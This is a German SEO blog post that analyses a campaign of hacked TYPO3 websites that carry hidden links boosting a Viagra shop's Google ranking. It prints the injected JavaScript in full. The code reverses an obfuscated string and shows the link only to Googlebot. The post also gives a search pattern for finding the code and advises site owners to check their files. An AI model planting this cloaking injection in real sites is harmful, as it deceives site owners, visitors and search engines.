Mit versteckten Links auf starken Domains lassen sich bei Google beständige Platz 1 Rankings für hart umkämpfte Keywords erzielen. Im Folgenden zeigen wir an einem aktuellen Fallbeispiel auf, wie die Websites großer Firmen, Vereine, Behörden und Gemeinden dabei helfen ein dauerhaftes Platz 1 Ranking für „Viagra kaufen“ zu erhalten – und warum es niemand merkt.
Die Kollegen von onma.de wurden darauf aufmerksam, dass die Domain toppotenzmittel.de derzeit bei Google auf Platz 1 für das Keyword „Viagra kaufen“ rankt, sich über die SEOkicks Backlinkanalyse aber nur eine handvoll kaum bedeutsamer Backlinks für diese Domain finden lässt. Für solch ein Money Keyword schien das Platz 1 Ranking kaum möglich zu sein, daher machten wir uns gemeinsam auf die Suche nach der Ursache – und wurden fündig.
Der zunächst etwas enttäuschende Grund: Es wird offenbar eine Sicherheitslücke in TYPO3 ausgenutzt, um hunderte Websites zu haken und dort unbemerkt eigene Codes einzuschleusen. Überraschend ist allerdings wie viele prominente Websites großer Firmen, Behörden, Vereine und Gemeinden unter den Opfern sind, mit welchen Tricks die Links zu toppotenzmittel.de vor ihrer Entdeckung geschützt werden und wie gut das seit vielen Monaten funktioniert.
Stand jetzt bringt die gezielte Suche versteckte Verlinkungen von mehr als 150 Domains hervor, darunter von den Websites der Amadeus FiRe AG, des Deutschen Roten Kreuz oder der Stadtverwaltung Gotha. Die Methodik ist dabei immer identisch. Als Bespiel dient uns die Domain schulsport-nrw.de, betrieben von der Landesstelle für den Schulsport NRW der Bezierksregierung Düsseldorf.
Für den normalen Besucher nahezu unsichtbar, wird auf der Unterseite https://www.schulsport-nrw.de/home.html der folgende Abschnitt (inkl. Link) eingefügt:
„Der wahre Durchbruch in der Medizin ist Viagra-Pillen. Kontaktieren Sie uns unter toppotenzmittel.de! Lieferung auf Ihre Anfrage.“
Damit weder die Betreiber noch die Besucher auf den offensichtlichen Hack aufmerksam werden, ist die Verlinkung tief im Code versteckt. Gefunden haben wir den relevanten Schadcode bei schulsport-nrw.de in der jquery-2.1.4.min.js, die vom Angreifer um diesen Abschnitt erweitert wurde:
function site() {
if (window.location.pathname !== window.indexPage ||
window.location.search !== '') {
return;
}
var find = '<h1 class="csc-firstHeader">News</h1>'
, pastePosition = 1
, add = '.egarfnA erhI fua gnurefeiL !>a/<
ed.lettimznetoppot>"/ed.lettimznetoppot//:sptth"
=ferh a< retnu snu eiS nereitkatnoK .nelliP-argaiV tsi nizideM
red ni hcurbhcruD erhaw reD';
var t = '';
for (var i = add.length - 1; i >= 0; i--) {
t = String(t + add[i])
}
add = t;
if (/google/i.test(navigator.userAgent)) {
var result = (pastePosition > 0) ? find + add :
add + find
document.body.innerHTML = document.body.innerHTML.
replace(find, result);
}
}
;
var indexPage = '/home.html';
document.addEventListener("DOMContentLoaded", site);
Was hier passiert: Es wird auf bewusst umständliche Weise auf der Unterseite /home.html nach dem Codeabschnitt <h1 class=“csc-firstHeader“>News</h1> gesucht, der durch diesen Code ergänzt wird:
Der wahre Durchbruch in der Medizin ist Viagra-Pillen. Kontaktieren Sie uns unter <a href=“https://toppotenzmittel.de/“>toppotenzmittel.de</a>! Lieferung auf Ihre Anfrage.
Die Platzierung des Codes findet jedoch nur statt, wenn der UserAgent das Wort „google“ (etwa googlebot) enthält.
Insgesamt werden gleich 3 Maßnahmen ergriffen, um den Link bestmöglich zu verstecken:
– Der Link wird per JavaScript über eine externe Datei erzeugt, ist also im direkten HTML-Code der Seite nicht sichbar
– Linktext inkl. Domain werden im Code rückwärts geschrieben (z. B. „/ed.lettimznetoppot//:sptth“ statt https://toppotenzmittel.de)
– Der Link wird, abhängig vom verwendeten Browser („Cloaking“), nur den verschiedenen Googlebots angezeigt (if (/google/i.test(navigator.userAgent)))
Auffällig ist zudem, dass sehr individuell vorgegangen wird. Bei schulsport-nrw.de befindet sich der Schadecode z. B. in der auch vorher existierende Datei jquery-2.1.4.min.js, während bei anderen gehackten Domains völlig andere .js Dateien genutzt werden, je nach Verfügbarkeit.
Da es sich bei allen auf diese Weise infizierten Domains um TYPO3 Installationen handelt, scheint es sich um ein TYPO3-spzifisches Sicherheitsproblem zu handeln. Problematisch hierbei ist, dass ein Sicherheitspatch allein ggf. keinen Einfluss auf die schon kompromitierten Dateien hat und diese nachträglich gezielt manuell aufgesprürt und bereinigt werden müssen. Ein sinnvolles Suchmuster hierfür wäre:
/google/i.test(navigator.userAgent)
Es wird jedem TYPO3 Nutzer dringend dazu geraten die eigene Website auf entsprechende unerwünschte Änderungen, auch in externen Scripten, zu überprüfen.
Wie beständig die auf diese Weise erzielten Rankings sind, zeigt ein Blick in die metric.tools (Affiliate Link). Demnach schaffte die Domain toppotenzmittel.de es im März 2019 erstmals in die Top 20 für „viagra kaufen“, ist seit Juni 2019 durchgehend in den Top 10 und seit November 2019 auf Platz 1.
Eine größere Liste gehackter Domains, die auf toppotenzmittel.de verlinken, lässt sich über eine einfache Google-Suche nach „toppotenzmittel.de“ (inkl. Anführungszeichen) finden. Neben den beständigen Rankings beweisen leider auch die Google-Snippets, dass die versteckten Links von Google erkannt und berücksichtigt werden. Auch 2020 erweisen sich Blackhat Techniken zurückliegender Jahrzente damit weiterhin als erschreckend erfolgreich.